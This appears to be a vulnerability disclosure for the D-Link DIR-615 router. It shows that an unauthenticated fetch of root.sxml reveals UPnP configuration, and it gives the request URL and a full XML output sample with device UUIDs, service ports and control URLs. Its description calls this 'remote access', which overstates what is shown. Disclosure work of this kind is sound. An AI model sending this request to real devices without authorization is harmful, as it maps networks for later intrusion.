Overview:
General device configuration and information such as UDN, services, service ID, Control URL and other detailed information from a D-Link DIR-615 Wireless N 300 router can be accessed by fetching root.sxml using a web browser.
Description:
Attacker can gain remote access to the D-Link DIR-615 Wireless N 300 router, general device information and configuration by fetching root.sxml file.
Exploit Syntax: http://deviceIP/root.sxml
Exploit Output for device with IP 192.168.150.1:
−<root> −<specVersion> <major>1</major> <minor>0</minor> </specVersion> <URLBase>http://192.168.150.1</URLBase> −<device> −<deviceType> urn:schemas-upnp-org:device:InternetGatewayDevice:1 </deviceType> <presentationURL>/</presentationURL> <friendlyName>Wireless N Router</friendlyName> <manufacturer>D-Link Systems</manufacturer> <manufacturerURL>http://www.dlink.com</manufacturerURL> <modelDescription>Wireless N Router</modelDescription> <modelName>Wireless N Router</modelName> <modelNumber>DIR-615</modelNumber> <modelURL>http://www.dlink.com</modelURL> <serialNumber>none</serialNumber> <UDN>uuid:280BA93F-BC7B-336E-8F78-733C78667090</UDN> <UPC>00000-00001</UPC> −<serviceList> −<service> <serviceType>urn:schemas-upnp-org:service:Layer3Forwarding:1</serviceType> <serviceId>urn:upnp-org:serviceId:L3Forwarding1</serviceId> <controlURL>http://192.168.150.1:4444/l3fw</controlURL> <eventSubURL>http://192.168.150.1:9393/l3fw</eventSubURL> <SCPDURL>http://192.168.150.1/l3fw.xml</SCPDURL> </service> </serviceList> −<deviceList> −<device> <deviceType>urn:schemas-upnp-org:device:WANDevice:1</deviceType> <friendlyName>Wireless N Router</friendlyName> <manufacturer>D-Link Systems</manufacturer> <manufacturerURL>http://www.dlink.com</manufacturerURL> <modelDescription>Wireless N Router</modelDescription> <modelName>Wireless N Router</modelName> <modelNumber>DIR-615</modelNumber> <modelURL>http://www.dlink.com</modelURL> <serialNumber>none</serialNumber> <UDN>uuid:616CA787-7B12-39B7-836B-9DDF50280572</UDN> <UPC>00000-00001</UPC> −<serviceList> −<service> −<serviceType> urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1 </serviceType> <serviceId>urn:upnp-org:serviceId:WANCommonIFC1</serviceId> <controlURL>http://192.168.150.1:4444/wcommifc</controlURL> <eventSubURL>http://192.168.150.1:9393/wcommifc</eventSubURL> <SCPDURL>http://192.168.150.1/WANCommonIFC1.xml</SCPDURL> </service> </serviceList> −<deviceList> −<device> <deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType> <friendlyName>Wireless N Router</friendlyName> <manufacturer>D-Link Systems</manufacturer> <manufacturerURL>http://www.dlink.com</manufacturerURL> <modelDescription>Wireless N Router</modelDescription> <modelName>Wireless N Router</modelName> <modelNumber>DIR-615</modelNumber> <modelURL>http://www.dlink.com</modelURL> <serialNumber>none</serialNumber> <UDN>uuid:C730E975-C618-3CC8-A0D8-92913DD5EC5E</UDN> <UPC>00000-00001</UPC> −<serviceList> −<service> <serviceType>urn:schemas-upnp-org:service:WANIPConnection:1</serviceType> <serviceId>urn:upnp-org:serviceId:WANIPConn1</serviceId> <controlURL>http://192.168.150.1:4444/wipconn</controlURL> <eventSubURL>http://192.168.150.1:9393/wipconn</eventSubURL> <SCPDURL>http://192.168.150.1/WANIPConn1.xml</SCPDURL> </service> </serviceList> </device> </deviceList> </device> −<device> <deviceType>urn:schemas-wifialliance-org:device:WFADevice:1</deviceType> <presentationURL>/</presentationURL> <friendlyName>WFADevice</friendlyName> <manufacturer>D-Link Systems</manufacturer> <manufacturerURL>http://www.dlink.com</manufacturerURL> <modelDescription>Wireless N Router</modelDescription> <modelName>Wireless N Router</modelName> <modelNumber>DIR-615</modelNumber> <modelURL>http://www.dlink.com</modelURL> <serialNumber>none</serialNumber> <UDN>uuid:5B0240B4-5042-3757-A05A-51DBD8DF789E</UDN> <UPC>00000-00001</UPC> −<serviceList> −<service> −<serviceType> urn:schemas-wifialliance-org:service:WFAWLANConfig:1 </serviceType> <serviceId>urn:wifialliance-org:serviceId:WFAWLANConfig1</serviceId> <controlURL>http://192.168.150.1:8832/wfawc</controlURL> <eventSubURL>http://192.168.150.1:8456/wfawc</eventSubURL> <SCPDURL>http://192.168.150.1/WFAwc.xml</SCPDURL> </service> </serviceList> </device> </deviceList> </device>
</root>
Impact:
Important device information and general configuration will be revealed without proper authorization.
Solution:
I am currently unaware of a solution to this problem.
Vendor Information:
http://www.dlink.com/products/?pid=565
Product Details:
D-Link Wireless access point
Product Page DIR-615
Hardware Version :B2
Firmware Version: 2.25
CERT(R) Coordination Center Tracking Code: VU#944927 Date: 01/10/2010